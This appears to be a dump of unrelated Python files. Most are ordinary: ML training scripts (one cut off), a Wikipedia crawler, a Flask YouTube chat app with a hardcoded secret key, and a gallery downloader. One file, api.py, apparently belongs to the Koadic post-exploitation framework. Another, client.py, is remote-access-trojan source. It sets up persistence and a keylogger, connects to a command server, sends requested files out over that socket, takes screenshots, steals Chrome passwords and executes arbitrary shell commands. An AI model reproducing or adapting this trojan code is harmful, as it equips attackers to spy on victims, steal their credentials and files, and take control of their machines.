api.py | import core.rest_server
import time
import sys
import os
DESCRIPTION = "turn off/on the rest api"
def autocomplete(shell, line, text, state):
return None
def help(shell):
pass
def execute(shell, cmd):
splitted = cmd.split()
if len(splitted) > 1:
username = "koadic"
password = "koadic"
port = "9990"
if "--user" in splitted:
username = splitted[splitted.index("--user")+1]
if "--pass" in splitted:
password = splitted[splitted.index("--pass")+1]
if "--port" in splitted:
port = splitted[splitted.index("--port")+1]
sw = splitted[1].lower()
if sw == "1" or sw == "on":
if not shell.rest_thread:
rest_server = core.rest_server.RestServer(shell, port, username, password)
def thread_rest_server():
try:
rest_server.run()
except SystemExit as e:
pass
stdout = sys.stdout
f = open(os.devnull, 'w')
sys.stdout = f
shell.rest_thread = core.rest_server.KThread(target=thread_rest_server)
shell.rest_thread.daemon = True
shell.rest_thread.start()
time.sleep(1)
sys.stdout = stdout
if shell.rest_thread:
shell.print_good("Rest server running on port %s" % port)
shell.print_status("Username: %s" % username)
shell.print_status("Password: %s" % password)
shell.print_status("API Token: %s" % rest_server.token)
else:
shell.print_error("Could not start rest server: ")
else:
shell.print_error("Rest server already running")
else:
if shell.rest_thread:
shell.rest_thread.kill()
shell.rest_thread = ""
shell.print_good("Rest server shutdown")
else:
shell.print_error("Rest server not running")
|
train.py | #!/usr/bin/env python
import argparse
import importlib
import json
import os
import pprint
import queue
import random
import threading
import traceback
import numpy as np
import torch
from torch.multiprocessing import Pool, Process, Queue
from tqdm import tqdm
from config import system_configs
from db.datasets import datasets
from nnet.py_factory import NetworkFactory
from utils import stdout_to_tqdm
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
def parse_args():
parser = argparse.ArgumentParser(description="Train CornerNet")
parser.add_argument("cfg_file", help="config file", type=str)
parser.add_argument("--iter", dest="start_iter",
help="train at iteration i",
default=0, type=int)
parser.add_argument("--threads", dest="threads", default=4, type=int)
args = parser.parse_args()
return args
def prefetch_data(db, queue, sample_data, data_aug):
ind = 0
print("start prefetching data...")
np.random.seed(os.getpid())
while True:
try:
data, ind = sample_data(db, ind, data_aug=data_aug)
queue.put(data)
except Exception as e:
traceback.print_exc()
raise e
def pin_memory(data_queue, pinned_data_queue, sema):
while True:
data = data_queue.get()
data["xs"] = [x.pin_memory() for x in data["xs"]]
data["ys"] = [y.pin_memory() for y in data["ys"]]
pinned_data_queue.put(data)
if sema.acquire(blocking=False):
return
def init_parallel_jobs(dbs, queue, fn, data_aug):
tasks = [Process(target=prefetch_data, args=(db, queue, fn, data_aug)) for db in dbs]
for task in tasks:
task.daemon = True
task.start()
return tasks
def train(training_dbs, validation_db, start_iter=0):
learning_rate = system_configs.learning_rate
max_iteration = system_configs.max_iter
pretrained_model = system_configs.pretrain
snapshot = system_configs.snapshot
val_iter = system_configs.val_iter
display = system_configs.display
decay_rate = system_configs.decay_rate
stepsize = system_configs.stepsize
# getting the size of each database
training_size = len(training_dbs[0].db_inds)
validation_size = len(validation_db.db_inds)
# queues storing data for training
training_queue = Queue(system_configs.prefetch_size)
validation_queue = Queue(5)
# queues storing pinned data for training
pinned_training_queue = queue.Queue(system_configs.prefetch_size)
pinned_validation_queue = queue.Queue(5)
# load data sampling function
data_file = "sample.{}".format(training_dbs[0].data)
sample_data = importlib.import_module(data_file).sample_data
# allocating resources for parallel reading
training_tasks = init_parallel_jobs(training_dbs, training_queue, sample_data, True)
if val_iter:
validation_tasks = init_parallel_jobs([validation_db], validation_queue, sample_data, False)
training_pin_semaphore = threading.Semaphore()
validation_pin_semaphore = threading.Semaphore()
training_pin_semaphore.acquire()
validation_pin_semaphore.acquire()
training_pin_args = (training_queue, pinned_training_queue, training_pin_semaphore)
training_pin_thread = threading.Thread(target=pin_memory, args=training_pin_args)
training_pin_thread.daemon = True
training_pin_thread.start()
validation_pin_args = (validation_queue, pinned_validation_queue, validation_pin_semaphore)
validation_pin_thread = threading.Thread(target=pin_memory, args=validation_pin_args)
validation_pin_thread.daemon = True
validation_pin_thread.start()
print("building model...")
nnet = NetworkFactory(training_dbs[0])
if pretrained_model is not None:
if not os.path.exists(pretrained_model):
raise ValueError("pretrained model does not exist")
print("loading from pretrained model")
nnet.load_pretrained_params(pretrained_model)
if start_iter:
learning_rate /= (decay_rate ** (start_iter // stepsize))
nnet.load_params(start_iter)
nnet.set_lr(learning_rate)
print("training starts from iteration {} with learning_rate {}".format(start_iter + 1, learning_rate))
else:
nnet.set_lr(learning_rate)
print("training start...")
nnet.cuda()
nnet.train_mode()
with stdout_to_tqdm() as save_stdout:
for iteration in tqdm(range(start_iter + 1, max_iteration + 1), file=save_stdout, ncols=80):
training = pinned_training_queue.get(block=True)
training_loss = nnet.train(**training) # 计算训练损失
if display and iteration % display == 0:
print("training loss at iteration {}: {}".format(iteration, training_loss.item()))
del training_loss
if val_iter and validation_db.db_inds.size and iteration % val_iter == 0:
nnet.eval_mode()
validation = pinned_validation_queue.get(block=True)
validation_loss = nnet.validate(**validation)
print("validation loss at iteration {}: {}".format(iteration, validation_loss.item()))
nnet.train_mode()
if iteration % snapshot == 0:
nnet.save_params(iteration)
if iteration % stepsize == 0:
learning_rate /= decay_rate
nnet.set_lr(learning_rate)
# sending signal to kill the thread
training_pin_semaphore.release()
validation_pin_semaphore.release()
# terminating data fetching processes
for training_task in training_tasks:
training_task.terminate()
for validation_task in validation_tasks:
validation_task.terminate()
if __name__ == "__main__":
# 处理配置参数
args = parse_args()
cfg_file = os.path.join(system_configs.config_dir, args.cfg_file + ".json")
with open(cfg_file, "r") as f:
configs = json.load(f)
configs["system"]["snapshot_name"] = args.cfg_file
system_configs.update_config(configs["system"])
train_split = system_configs.train_split
val_split = system_configs.val_split
print("loading all datasets...")
dataset = system_configs.dataset
# threads = max(torch.cuda.device_count() * 2, 4)
threads = args.threads
print("using {} threads".format(threads))
training_dbs = [datasets[dataset](configs["db"], train_split) for _ in range(threads)]
validation_db = datasets[dataset](configs["db"], val_split)
print("system config...")
pprint.pprint(system_configs.full)
print("db config...")
pprint.pprint(training_dbs[0].configs)
print("len of db: {}".format(len(training_dbs[0].db_inds)))
train(training_dbs, validation_db, args.start_iter)
|
Collector.py | import requests
import threading
from queue import Queue
from lxml import html
import time
class Collector():
itemsToCheck = ['#', 'File:', '_(disambiguation)', 'Template:', 'Category:', 'Wikipedia_talk:']
def __init__(self, url):
self.startUrl = url
self.seen = []
self.queue = Queue()
self.counter = 0
self.threads = []
def startCollection(self, thread_amount):
self.initialCollection(self.startUrl)
time.sleep(5)
self.createThreads(thread_amount)
# self.startThreads()
print(f'{thread_amount} threads have started')
def initialCollection(self, url):
self.queue.put(url)
curr = self.queue.get()
self.counter += 1
print(f"\r{self.counter}", end="")
try:
res = requests.get(curr, headers={'Accept': 'application/json'})
except Exception:
print(f'Error at URL: {curr}')
self.queue.put(curr)
self.seen.append(curr)
webpage = html.fromstring(res.content)
roughLinks = webpage.xpath("//div[@id='mw-content-text']//preceding::span[@id='See_also']/preceding::a/@href")
if len(roughLinks) == 0:
roughLinks = webpage.xpath("//div[@id='mw-content-text']//a/@href")
cleanedLinks = []
for i in roughLinks:
if not i.startswith('/wiki/') or any(x in i for x in self.itemsToCheck):
continue
else:
link = 'https://en.wikipedia.org' + i
cleanedLinks.append(link)
if link not in self.seen:
self.queue.put('https://en.wikipedia.org' + i)
f = open('WikiPages', 'a')
f.write(curr + ' ' + ' '.join(link for link in cleanedLinks)[:-1] + '\n')
f.close()
def collectPages(self):
while not self.queue.empty():
curr = self.queue.get()
if curr in self.seen:
continue
self.counter += 1
print(f"\r{self.counter}", end="")
try:
res = requests.get(curr, headers={'Accept': 'application/json'})
except Exception:
print(f'Error at URL: {curr}')
self.queue.put(curr)
self.seen.append(curr)
webpage = html.fromstring(res.content)
roughLinks = webpage.xpath("//div[@id='mw-content-text']//preceding::span[@id='See_also']/preceding::a/@href")
if len(roughLinks) == 0:
roughLinks = webpage.xpath("//div[@id='mw-content-text']//a/@href")
cleanedLinks = []
for i in roughLinks:
if not i.startswith('/wiki/') or any(x in i for x in self.itemsToCheck):
continue
else:
link = 'https://en.wikipedia.org' + i
cleanedLinks.append(link)
if link not in self.seen:
self.queue.put('https://en.wikipedia.org' + i)
f = open('WikiPages', 'a')
f.write(curr + ' ' + ' '.join(link for link in cleanedLinks)[:-1] + '\n')
f.close()
def createThreads(self, amount):
print(f'Creating {amount} Threads')
for i in range(amount):
t = threading.Thread(target=self.collectPages())
t.daemon = True
self.threads.append(t)
print(f'Starting {len(self.threads)} Threads')
for i in range(amount):
self.threads[i].start()
for i in range(amount):
self.threads[i].join()
if __name__ == '__main__':
startURL = 'https://en.wikipedia.org/wiki/Bread'
print(f"Starting Collector at URL: {startURL}")
BreadCollector = Collector(startURL)
BreadCollector.startCollection(10) |
yt.py | import json
from apiclient.discovery import build_from_document, build
import httplib2
import random
import time
import os
from oauth2client.client import OAuth2WebServerFlow, AccessTokenCredentials
from flask import Flask, render_template, session, request, redirect, url_for, abort, jsonify, Response
from flask_socketio import SocketIO, emit, join_room, leave_room
from threading import Thread
from flask_pymongo import PyMongo
CLIENT_ID = os.getenv('CLIENT_ID')
CLIENT_SECRET = os.getenv('CLIENT_SECRET')
app = Flask(__name__)
app.config['MONGO_DBNAME'] = 'yt'
app.config['MONGO_URI'] = os.getenv('MONGOURL')
app.secret_key = 'mysecretKEY'
socketio = SocketIO(app)
mongo = PyMongo(app)
activeRooms = {}
def getComments(id, youtube, credentials, pageToken=""):
print("GETTING with token {}".format(pageToken))
if id not in activeRooms or len(activeRooms[id]) == 0:
print("NO USERS")
activeRooms.pop(id, None)
return
if not any(c.access_token == credentials.access_token for c in activeRooms[id]):
print("USING SOMEONE ELSES CREDS")
credentials = activeRooms[id][0]
http = httplib2.Http()
http = credentials.authorize(http)
youtube = build("youtube", "v3", http=http)
liveStreamingInfo = youtube.videos().list(
part="liveStreamingDetails",
id=id
).execute()
try:
liveStreamingInfo = liveStreamingInfo['items'][0]['liveStreamingDetails']['activeLiveChatId']
except:
print("no livestreaming info")
comments = youtube.liveChatMessages().list(
liveChatId=liveStreamingInfo,
part="snippet, authorDetails",
pageToken=pageToken
).execute()
# insert comments['items'] into mongodb, only want author, display text, and current room id
with app.app_context():
if len(comments['items']):
mongo.db.comments.insert_many(
[{'text': comment['snippet']['displayMessage'], 'author': comment['authorDetails']['displayName'], 'publishedAt': comment['snippet']['publishedAt'], "channel": id} for comment in comments['items']])
comments['items'] = list(reversed(comments['items']))
print("EMITTING TO ROOM {}".format(id))
socketio.emit('comments', comments, room=id)
socketio.sleep(0)
print("WAITING {}".format(comments['pollingIntervalMillis']/1000.0))
time.sleep(comments["pollingIntervalMillis"]/1000.0)
getComments(id, youtube, credentials, comments["nextPageToken"])
@socketio.on('connect')
def test_connect():
print('Client connected')
@socketio.on('disconnect')
def test_disconnect():
global activeRooms
print('Client disconnected')
credentials = AccessTokenCredentials(session['credentials'], 'user-agent-value')
for room in activeRooms:
for c in activeRooms[room]:
if c.access_token == credentials.access_token:
print("FOUND AND REMOVING")
activeRooms[room].remove(c)
@socketio.on('join')
def on_join(data):
print("joining")
# On join of a room. Check if that room is currently an active room.
# If its not, add it to the active rooms and start getting comments for it.
# If it is, do nothing
id = data['id']
join_room(id)
credentials = AccessTokenCredentials(session['credentials'], 'user-agent-value')
global activeRooms
if id not in activeRooms:
activeRooms[id] = [credentials]
http = httplib2.Http()
http = credentials.authorize(http)
youtube = build("youtube", "v3", http=http)
thread1 = Thread(target=getComments, args = (id, youtube, credentials))
thread1.start()
else:
activeRooms[id].append(credentials)
@app.route('/comments/<username>')
def getCommentCountForUser(username):
try:
print(username)
commentsCount = mongo.db.comments.count({"author": username})
return jsonify({'comments': commentsCount})
except Exception as e:
print(e)
@app.route('/login')
def login():
flow = OAuth2WebServerFlow(client_id=CLIENT_ID,
client_secret=CLIENT_SECRET,
scope='https://www.googleapis.com/auth/youtube',
redirect_uri='https://streamlabs-challenge.herokuapp.com/oauth2callback',
approval_prompt='force',
access_type='offline')
auth_uri = flow.step1_get_authorize_url()
return redirect(auth_uri)
@app.route('/signout')
def signout():
del session['credentials']
session['message'] = "You have logged out"
return redirect(url_for('index'))
@app.route('/oauth2callback')
def oauth2callback():
code = request.args.get('code')
if code:
# exchange the authorization code for user credentials
flow = OAuth2WebServerFlow(CLIENT_ID,
CLIENT_SECRET,
"https://www.googleapis.com/auth/youtube")
flow.redirect_uri = request.base_url
try:
credentials = flow.step2_exchange(code)
except Exception as e:
print "Unable to get an access token because ", e.message
# store these credentials for the current user in the session
# This stores them in a cookie, which is insecure. Update this
# with something better if you deploy to production land
session['credentials'] = credentials.access_token
return redirect(url_for('index'))
@app.route('/')
def index():
if 'credentials' not in session:
return redirect(url_for('login'))
credentials = AccessTokenCredentials(session['credentials'], 'user-agent-value')
http = httplib2.Http()
http = credentials.authorize(http)
topVid = None
try:
youtube = build("youtube", "v3", http=http)
topVid = youtube.search().list(
part="snippet",
eventType="live",
type="video",
videoEmbeddable="true"
).execute()
except Exception as e:
return redirect(url_for('login'))
topVid = topVid['items'][0]
return render_template("index.html", topVid=json.dumps(topVid))
if __name__ == '__main__':
app.run(host='0.0.0.0')
socketio.run(app)
|
hentairoxdl.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# script by HYOUG
from argparse import ArgumentParser
from os import listdir, makedirs, remove
from os.path import basename, exists, join
from threading import Lock, Thread
from time import sleep, time
from zipfile import ZIP_DEFLATED, ZipFile
from bs4 import BeautifulSoup
from colorama import Fore
from requests import get
from tqdm import tqdm
from misc.errors import *
IMAGE_EXTENSIONS = ["jpg", "png", "gif"]
FORBIDDEN_CHARS = ["<", ">", ":", "\"", "/", "\\", "|", "?", "*"]
NONE_TYPE = type(None)
metadata_dict = {
"parodies": [],
"characters": [],
"tags": [],
"artists": [],
"groups": [],
"languages": [],
"category": []
}
model_vars = {
"gallery_name": "",
"gallery_id": "",
"page_num": "",
"pages_num": ""
}
def dl_gallery(gallery_url:str, output:str, filename:str, pages:list,
archive: str or NONE_TYPE, threads:int, metadata:bool) -> None:
"""
Download a given Hentai Rox Gallery
Parameters
----------
gallery_url : str
URL from the targeted gallery page
output : str
Output path for the downloaded pictures, by default "./downloads"
filename : str
Filename model for the downloaded pictures, by default "{gallery_id}_{page_num}"
pages : list
Minimum and maximum page indexed for the downloaded pictures, by default [0, -1]
archive : str or NONE_TYPE
Archive the downloaded pictures if a name is given, by default None
threads : int
Number of workers downloading pictures in parallel, by default 1
metadata : bool
Save gallery metadata in a file (metadata.txt), by default False
Raises
------
InvalidURL
The gallery URL given is invalid
"""
assert isinstance(gallery_url, str), f"Invalid data format given for the 'gallery_url' argument : {type(gallery_url)} (instead of str)"
assert isinstance(output, str), f"Invalid data format given for the 'output' argument : {type(output)} (instead of str)"
assert isinstance(filename, str), f"Invalid data format given for the '_filename' argument : {type(filename)} (instead of str)"
assert isinstance(pages, list), f"Invalid data format given for the 'pages' argument : {type(pages)} (instead of list)"
assert isinstance(archive, (NONE_TYPE, str)), f"Invalid data format given for the 'archive' argument : {type(archive)} (instead of NONE_TYPE or str)"
assert isinstance(threads, int), f"Invalid data format given for the 'threads' argument : {type(threads)} (instead of int)"
assert isinstance(metadata, bool), f"Invalid data format given for the 'metadata' argument : {type(metadata)} (instead of bool)"
assert gallery_url.startswith("https://hentairox.com/gallery/") or gallery_url.startswith("https://www.hentairox.com/gallery/"), f"Invalid gallery URL given : {gallery_url}"
assert True not in [el in filename.format(**model_vars) for el in FORBIDDEN_CHARS], f"Invalid filename given, it contains forbiden characters : {filename}"
gallery_id = [i for i in gallery_url.split("/") if i != ""][-1]
threads_list = []
dl_cancelled = False
pbar_lock = Lock()
stop_lock = Lock()
archive_lock = Lock()
if not exists(output):
makedirs(output)
response = get(gallery_url)
if response.status_code == 404:
raise InvalidURL(gallery_url)
soup = BeautifulSoup(response.content, "html.parser")
gallery_name = soup.find("h1").string
metadata_tags = soup.find_all("span", {"class": "item_name"})
for metadata_tag in metadata_tags:
metadata_type = metadata_tag.parent["href"]
if metadata_type.startswith("/parody"):
metadata_dict["parodies"].append(metadata_tag.contents[0])
elif metadata_type.startswith("/character"):
metadata_dict["characters"].append(metadata_tag.contents[0])
elif metadata_type.startswith("/tag"):
metadata_dict["tags"].append(metadata_tag.contents[0])
elif metadata_type.startswith("/artist"):
metadata_dict["artists"].append(metadata_tag.contents[0])
elif metadata_type.startswith("/group"):
metadata_dict["groups"].append(metadata_tag.contents[0])
elif metadata_type.startswith("/language"):
metadata_dict["languages"].append(metadata_tag.contents[0])
elif metadata_type.startswith("/category"):
metadata_dict["category"].append(metadata_tag.contents[0])
page_num_node = soup.find("li", {"class": "pages"})
pages_num = int(page_num_node.string.split(" ")[0])
first_img = soup.find("img", {"class": "lazy preloader"})
pattern = "/".join(first_img["data-src"].split("/")[:-1]) + "/"
print(f"\nGallery : {Fore.LIGHTBLUE_EX}{gallery_name}{Fore.RESET}\n")
if archive is not None:
fp_archive = join(output, f"{archive}.zip")
if f"{archive}.zip" not in listdir(output):
zf = ZipFile(fp_archive, "w", ZIP_DEFLATED)
else:
zf = ZipFile(fp_archive, "a", ZIP_DEFLATED)
if metadata:
fp = join(output, "metadata.txt")
f = open(fp, "w", encoding="utf-8")
f.write(f"Gallery name: {gallery_name}\n")
f.write(f"URL: {gallery_url}\n")
f.write(f"Pages: {pages_num}\n\n")
f.write(f"Metadata:\n")
for (category, tag_list) in metadata_dict.items():
if len(tag_list) > 0:
f.write(f"* {category}: {', '.join(tag_list)}\n")
f.close()
if archive is not None:
zf.write(fp, basename(fp))
remove(fp)
p_start = list(range(pages_num)).index(list(range(pages_num))[pages[0]])
p_end = list(range(pages_num)).index(list(range(pages_num))[pages[1]])
p_len = p_end - p_start
dl_bar = tqdm(
iterable=range(p_start, p_end),
bar_format="Download : |{bar:30}| [{n_fmt}/{total_fmt}] ({percentage:.0f}%)",
ascii="_▌█")
def dl_pages(start_index, end_index):
for i in range(start_index, end_index):
for ext in IMAGE_EXTENSIONS:
response = get(f"{pattern}/{i+1}.{ext}")
if response.status_code == 200:
formatfound = True
im_ext = ext
break
formatfound = False
if formatfound:
model_vars["gallery_name"] = gallery_name
model_vars["gallery_id"] = gallery_id
model_vars["page_num"] = str(i)
model_vars["pages_num"] = str((end_index-1)-start_index)
parsed_filename = filename.format(**model_vars)
if archive is not None:
with archive_lock:
zf = ZipFile(fp_archive, "a")
try:
zf.writestr(f"{parsed_filename}.{im_ext}", response.content)
except UserWarning:
pass #TODO Handle error
except OSError:
pass #TODO Handle error
zf.close()
else:
fp = join(output, f"{parsed_filename}.{im_ext}")
try:
f = open(fp, "wb")
except OSError:
pass #TODO Handle error
f.write(response.content)
f.close()
with stop_lock:
if dl_cancelled:
break
else:
with pbar_lock:
dl_bar.update()
for i in range(threads):
if i != threads-1:
t_start = p_start + ((p_len//threads) * i)
t_end = p_start + ((p_len//threads) * (i+1))
else:
t_start = p_start + ((p_len//threads) * i)
t_end = p_start + ((p_len//threads) * (i+1)) + (p_len % threads)
thread = Thread(target=dl_pages, args=(t_start, t_end))
threads_list.append(thread)
threads_list[-1].start()
try:
while True:
end = True
for thread in threads_list:
if thread.is_alive():
end = False
if end:
break
except KeyboardInterrupt:
dl_cancelled = True
with pbar_lock:
dl_bar.close()
sleep(2)
with stop_lock:
print(f"\n{Fore.LIGHTRED_EX}Download cancelled{Fore.RESET}")
exit()
def main():
start = time()
parser = ArgumentParser(prog="HentaiRoxDL.py",
epilog="Made with <3 by HYOUG")
parser.add_argument("gallery_url",
nargs="+",
help="The URL from the targeted gallery page",
metavar="GALLERY_URL")
parser.add_argument("-o", "--output",
default="./downloads",
help="Path for the output for the downloaded content",
metavar="PATH")
parser.add_argument("-f", "--filename",
default="{gallery_id}_{page_num}",
help="Filename model given to the downloaded pictures",
metavar="FILENAME_MODEL")
parser.add_argument("-p", "--pages",
nargs=2,
default=[0, -1],
type=int,
help="Specific page indexes to download",
metavar=("START_INDEX", "STOP_INDEX"))
parser.add_argument("-a", "--archive",
default=None,
help="Archive the downloaded pictures in a zip file with the given name",
metavar="ARCHIVE_NAME")
parser.add_argument("-t", "--threads-num",
default=1,
type=int,
help="Downloads the targeted pictures in parallel with N threads. N being the provided argument",
metavar="WORKERS_NUM")
parser.add_argument("-m", "--metadata",
action="store_true",
default=False,
help="Save the gallery's metadata into a file (metadata.txt)")
args = parser.parse_args()
for url in args.gallery_url:
dl_gallery(url, args.output, args.filename, args.pages, args.archive, args.threads, args.metadata)
print(f"\n{Fore.LIGHTGREEN_EX}Download finished in {(time()-start):.0f} seconds{Fore.RESET}")
if __name__ == "__main__":
main()
|
client.py | import os
import subprocess
import time
from PIL import ImageGrab
import tempfile
import shutil
import socket
import threading
import pyaudio
import wave
import cv2
import operator
import collections
from modules import persistent
from modules import serverdiscovery
from modules import keylog
from modules import scanner
from modules import admincheck
from modules import chrome
from modules import dynmod
###################
#making a copy of it
###################
try:
persistent.persist()
print 'step 1 pass'
except:
print 'step 1 fail'
pass
##################
#Keylogger will start as the program starts along with clipboard hijacker
##################
path = os.getcwd().strip('/n')
Null,userprof = subprocess.check_output('set USERPROFILE',shell=True).split('=')
destination = userprof.strip('\n\r') + '\\Documents\\'
#################
pathforkey = destination + 'keylog.txt'
kl = keylog.keyLogger(pathforkey)
try:
threading.Thread(target=kl.run).start()
print 'keylogger pass'
except Exception,e:
print 'keylogger failed' + str(e)
pass
##################
#Transfer module
##################
def transfer(s,path):
if os.path.exists(path):
f = open(path, 'rb')
packet = f.read(1024)
while packet != '':
s.send(packet)
packet = f.read(1024)
s.send('DONE')
f.close()
else:
s.send('Unable to find out the file')
try:
host = serverdiscovery.sdiscover()
except:
pass
##################
#Starting a actual client
#First checking the server ip and its status i.e up or down
#Do not initiate connection unless server is conform
##################
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 8080))
print 'in step 4'
print 'IP is :' + str(host)
while True:
if (host != '0.0.0.0') :
command = s.recv(1024)
if not command:
pass
elif 'terminate' in command:
s.close()
break
elif 'grab' in command:
grab,path = command.split('*')
try:
transfer(s,path)
except Exception,e:
s.send ( str(e) )
pass
elif 'cd' in command:
code,directory = command.split (' ')
os.chdir(directory)
cur_dir = os.getcwd()
s.send(str(cur_dir))
elif 'screenshot' in command:
dirpath = os.getcwd()
ImageGrab.grab().save(destination + "\img.jpg", "JPEG")
s.send('ok')
elif 'admin?' in command:
result = admincheck.checkadmin()
s.send(str(result))
elif 'scan' in command:
command = command[5:]
ip,ports = command.split(':')
scanner.scanner(s,ip,ports)
elif 'chrome' in command:
chrome.chromepass()
s.send('[+]File saved in documents')
elif 'loadmodule' in command:
none,name,ip = command.split('*')
try:
if (dynmod.lodmod(name,ip) == 1):
s.send("[+]Module loaded successfully")
except:
s.send("[-]Failed to load module")
else:
CMD = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
s.send( CMD.stdout.read())
s.send( CMD.stderr.read())
def main ():
connect()
main()
|
main.py | # Copyright 2020 Google Research. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The main training script."""
import multiprocessing
import os
from absl import app
from absl import flags
from absl import logging
import numpy as np
import tensorflow.compat.v1 as tf
import dataloader
import det_model_fn
import hparams_config
import utils
flags.DEFINE_string(
'tpu',
default=None,
help='The Cloud TPU to use for training. This should be either the name '
'used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 '
'url.')
flags.DEFINE_string(
'gcp_project',
default=None,
help='Project name for the Cloud TPU-enabled project. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string(
'tpu_zone',
default=None,
help='GCE zone where the Cloud TPU is located in. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string('eval_name', default=None, help='Eval job name')
flags.DEFINE_enum('strategy', None, ['tpu', 'gpus', ''],
'Training: gpus for multi-gpu, if None, use TF default.')
flags.DEFINE_bool('use_fake_data', False, 'Use fake input.')
flags.DEFINE_bool(
'use_xla', False,
'Use XLA even if strategy is not tpu. If strategy is tpu, always use XLA, '
'and this flag has no effect.')
flags.DEFINE_string('model_dir', None, 'Location of model_dir')
flags.DEFINE_string(
'backbone_ckpt', '', 'Location of the ResNet50 checkpoint to use for model '
'initialization.')
flags.DEFINE_string('ckpt', None,
'Start training from this EfficientDet checkpoint.')
flags.DEFINE_string(
'hparams', '', 'Comma separated k=v pairs of hyperparameters or a module'
' containing attributes to use as hyperparameters.')
flags.DEFINE_integer(
'num_cores', default=8, help='Number of TPU cores for training')
flags.DEFINE_bool('use_spatial_partition', False, 'Use spatial partition.')
flags.DEFINE_integer(
'num_cores_per_replica',
default=2,
help='Number of TPU cores per replica when using spatial partition.')
flags.DEFINE_multi_integer(
'input_partition_dims', [1, 2, 1, 1],
'A list that describes the partition dims for all the tensors.')
flags.DEFINE_integer('train_batch_size', 64, 'global training batch size')
flags.DEFINE_integer('eval_batch_size', 1, 'global evaluation batch size')
flags.DEFINE_integer('eval_samples', 5000, 'Number of samples for eval.')
flags.DEFINE_integer('iterations_per_loop', 100,
'Number of iterations per TPU training loop')
flags.DEFINE_integer('save_checkpoints_steps', 100,
'Number of iterations per checkpoint save')
flags.DEFINE_string(
'training_file_pattern', None,
'Glob for training data files (e.g., COCO train - minival set)')
flags.DEFINE_string('validation_file_pattern', None,
'Glob for evaluation tfrecords (e.g., COCO val2017 set)')
flags.DEFINE_string(
'val_json_file', None,
'COCO validation JSON containing golden bounding boxes. If None, use the '
'ground truth from the dataloader. Ignored if testdev_dir is not None.')
flags.DEFINE_string('testdev_dir', None,
'COCO testdev dir. If not None, ignorer val_json_file.')
flags.DEFINE_integer('num_examples_per_epoch', 120000,
'Number of examples in one epoch')
flags.DEFINE_integer('num_epochs', None, 'Number of epochs for training')
flags.DEFINE_string('mode', 'train',
'Mode to run: train or eval (default: train)')
flags.DEFINE_string('model_name', 'efficientdet-d1', 'Model name.')
flags.DEFINE_bool('eval_after_training', False, 'Run one eval after the '
'training finishes.')
flags.DEFINE_bool('profile', False, 'Profile training performance.')
flags.DEFINE_integer(
'tf_random_seed', None, 'Sets the TF graph seed for deterministic execution'
' across runs (for debugging).')
# For Eval mode
flags.DEFINE_integer('min_eval_interval', 180,
'Minimum seconds between evaluations.')
flags.DEFINE_integer(
'eval_timeout', None,
'Maximum seconds between checkpoints before evaluation terminates.')
# for train_and_eval mode
flags.DEFINE_bool(
'run_epoch_in_child_process', False,
'This option helps to rectify CPU memory leak. If True, every epoch is '
'run in a separate process for train and eval and memory will be cleared.'
'Drawback: need to kill 2 processes if trainining needs to be interrupted.')
FLAGS = flags.FLAGS
def main(_):
if FLAGS.strategy == 'tpu':
tf.disable_eager_execution()
tpu_cluster_resolver = tf.distribute.cluster_resolver.TPUClusterResolver(
FLAGS.tpu, zone=FLAGS.tpu_zone, project=FLAGS.gcp_project)
tpu_grpc_url = tpu_cluster_resolver.get_master()
tf.Session.reset(tpu_grpc_url)
else:
tpu_cluster_resolver = None
# Check data path
if FLAGS.mode in ('train', 'train_and_eval'):
if FLAGS.training_file_pattern is None:
raise RuntimeError('Must specify --training_file_pattern for train.')
if FLAGS.mode in ('eval', 'train_and_eval'):
if FLAGS.validation_file_pattern is None:
raise RuntimeError('Must specify --validation_file_pattern for eval.')
# Parse and override hparams
config = hparams_config.get_detection_config(FLAGS.model_name)
config.override(FLAGS.hparams)
if FLAGS.num_epochs: # NOTE: remove this flag after updating all docs.
config.num_epochs = FLAGS.num_epochs
# Parse image size in case it is in string format.
config.image_size = utils.parse_image_size(config.image_size)
# The following is for spatial partitioning. `features` has one tensor while
# `labels` had 4 + (`max_level` - `min_level` + 1) * 2 tensors. The input
# partition is performed on `features` and all partitionable tensors of
# `labels`, see the partition logic below.
# In the TPUEstimator context, the meaning of `shard` and `replica` is the
# same; follwing the API, here has mixed use of both.
if FLAGS.use_spatial_partition:
# Checks input_partition_dims agrees with num_cores_per_replica.
if FLAGS.num_cores_per_replica != np.prod(FLAGS.input_partition_dims):
raise RuntimeError('--num_cores_per_replica must be a product of array'
'elements in --input_partition_dims.')
labels_partition_dims = {
'mean_num_positives': None,
'source_ids': None,
'groundtruth_data': None,
'image_scales': None,
'image_masks': None,
}
# The Input Partition Logic: We partition only the partition-able tensors.
feat_sizes = utils.get_feat_sizes(
config.get('image_size'), config.get('max_level'))
for level in range(config.get('min_level'), config.get('max_level') + 1):
def _can_partition(spatial_dim):
partitionable_index = np.where(
spatial_dim % np.array(FLAGS.input_partition_dims) == 0)
return len(partitionable_index[0]) == len(FLAGS.input_partition_dims)
spatial_dim = feat_sizes[level]
if _can_partition(spatial_dim['height']) and _can_partition(
spatial_dim['width']):
labels_partition_dims['box_targets_%d' %
level] = FLAGS.input_partition_dims
labels_partition_dims['cls_targets_%d' %
level] = FLAGS.input_partition_dims
else:
labels_partition_dims['box_targets_%d' % level] = None
labels_partition_dims['cls_targets_%d' % level] = None
num_cores_per_replica = FLAGS.num_cores_per_replica
input_partition_dims = [FLAGS.input_partition_dims, labels_partition_dims]
num_shards = FLAGS.num_cores // num_cores_per_replica
else:
num_cores_per_replica = None
input_partition_dims = None
num_shards = FLAGS.num_cores
params = dict(
config.as_dict(),
model_name=FLAGS.model_name,
iterations_per_loop=FLAGS.iterations_per_loop,
model_dir=FLAGS.model_dir,
